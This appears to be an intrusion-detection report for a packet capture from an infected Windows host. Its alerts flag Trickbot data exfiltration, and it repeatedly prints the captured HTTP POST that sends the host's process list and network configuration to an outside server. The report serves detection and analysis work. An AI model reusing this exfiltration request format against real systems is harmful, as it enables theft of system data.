traffic.pcap

MD5	00483d1713ea302216b16c1ed515ecff
Submission Date	2021-04-07 00:22:41
Tags	(not set)

Alert 24

Showing 1-20 of 24 items.

Timestamp

Src Ip

Dest Ip

Alert Signature

2021-01-04T09:01:44.921543-0800

172.16.1.101

207.231.106.130

ET POLICY IP Check wtfismyip.com

2021-01-04T09:01:44.921543-0800

172.16.1.101

207.231.106.130

ET POLICY curl User-Agent Outbound

2021-01-04T09:07:21.784671-0800

172.16.1.101

103.14.232.46

ET POLICY HTTP traffic on port 443 (POST)

Timestamp	2021-01-04T09:07:21.784974-0800
Flow Id	991277567511749
Source IP	172.16.1.101
Source Port	65522
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	GPL ATTACK_RESPONSE command completed
Alert Category	Potentially Bad Traffic
Alert Severity	2
Alert Gid	1
Alert Signature Id	2100494
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:07:21.784974-0800

172.16.1.101

103.14.232.46

GPL ATTACK_RESPONSE command completed

Timestamp	2021-01-04T09:07:22.285590-0800
Flow Id	991277567511749
Source IP	172.16.1.101
Source Port	65522
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
Alert Category	A Network Trojan was Detected
Alert Severity	1
Alert Gid	1
Alert Signature Id	2027117
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:07:22.285590-0800

172.16.1.101

103.14.232.46

ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration

Timestamp	2021-01-04T09:07:22.285590-0800
Flow Id	991277567511749
Source IP	172.16.1.101
Source Port	65522
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	ET TROJAN Win32/Trickbot Data Exfiltration
Alert Category	A Network Trojan was Detected
Alert Severity	1
Alert Gid	1
Alert Signature Id	2031241
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:07:22.285590-0800

172.16.1.101

103.14.232.46

ET TROJAN Win32/Trickbot Data Exfiltration

Timestamp	2021-01-04T09:07:22.285590-0800
Flow Id	991277567511749
Source IP	172.16.1.101
Source Port	65522
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	GPL ATTACK_RESPONSE command completed
Alert Category	Potentially Bad Traffic
Alert Severity	2
Alert Gid	1
Alert Signature Id	2100494
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:07:22.285590-0800

172.16.1.101

103.14.232.46

GPL ATTACK_RESPONSE command completed

2021-01-04T09:08:01.346856-0800

172.16.1.101

103.14.232.46

ET POLICY HTTP traffic on port 443 (POST)

2021-01-04T09:01:40.925947-0800

102.164.208.44

172.16.1.101

ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)

2021-01-04T09:08:01.799739-0800

172.16.1.101

103.14.232.46

ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1

2021-01-04T09:09:46.713500-0800

172.16.1.101

103.14.232.46

ET POLICY HTTP traffic on port 443 (POST)

Timestamp	2021-01-04T09:09:47.235865-0800
Flow Id	1006814621206280
Source IP	172.16.1.101
Source Port	49153
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
Alert Category	A Network Trojan was Detected
Alert Severity	1
Alert Gid	1
Alert Signature Id	2027117
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:09:47.235865-0800

172.16.1.101

103.14.232.46

ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration

Timestamp	2021-01-04T09:09:47.235865-0800
Flow Id	1006814621206280
Source IP	172.16.1.101
Source Port	49153
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	ET TROJAN Win32/Trickbot Data Exfiltration
Alert Category	A Network Trojan was Detected
Alert Severity	1
Alert Gid	1
Alert Signature Id	2031241
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:09:47.235865-0800

172.16.1.101

103.14.232.46

ET TROJAN Win32/Trickbot Data Exfiltration

Timestamp	2021-01-04T09:09:47.235865-0800
Flow Id	1006814621206280
Source IP	172.16.1.101
Source Port	49153
Destination IP	103.14.232.46
Destination Port	443
Protocol	TCP
Alert Signature	GPL ATTACK_RESPONSE command completed
Alert Category	Potentially Bad Traffic
Alert Severity	2
Alert Gid	1
Alert Signature Id	2100494
Payload Printable	POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW User-Agent: Winhttp 1/0 Content-Length: 5876 Host: 103.14.232.46:443 -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="proclist" ..----------------PROCESS LIST---------------- [System Process] System Registry smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe fontdrvhost.exe fontdrvhost.exe svchost.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe Memory Compression svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe armsvc.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe MsMpEng.exe svchost.exe svchost.exe svchost.exe SecurityHealthService.exe dllhost.exe sihost.exe svchost.exe svchost.exe taskhostw.exe svchost.exe svchost.exe ctfmon.exe svchost.exe explorer.exe svchost.exe StartMenuExperienceHost.exe RuntimeBroker.exe SearchApp.exe RuntimeBroker.exe svchost.exe RuntimeBroker.exe svchost.exe TextInputHost.exe dllhost.exe SecurityHealthSystray.exe ApplicationFrameHost.exe svchost.exe svchost.exe RuntimeBroker.exe svchost.exe svchost.exe svchost.exe SgrmBroker.exe svchost.exe svchost.exe svchost.exe svchost.exe Microsoft.Photos.exe svchost.exe svchost.exe OfficeClickToRun.exe AppVShNotify.exe AppVShNotify.exe SearchIndexer.exe RuntimeBroker.exe svchost.exe YourPhone.exe svchost.exe svchost.exe svchost.exe WUDFHost.exe WinStore.App.exe svchost.exe svchost.exe rundll32.exe wermgr.exe ShellExperienceHost.exe RuntimeBroker.exe svchost.exe smartscreen.exe svchost.exe svchost.exe audiodg.exe SearchProtocolHost.exe SearchFilterHost.exe cmd.exe conhost.exe cmd.exe conhost.exe proclisttest -----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="sysinfo" ..----------------SYSTEM_INFO---------------- .ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1 Primary Dns Suffix . . . . . . . : dorkyankees.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . 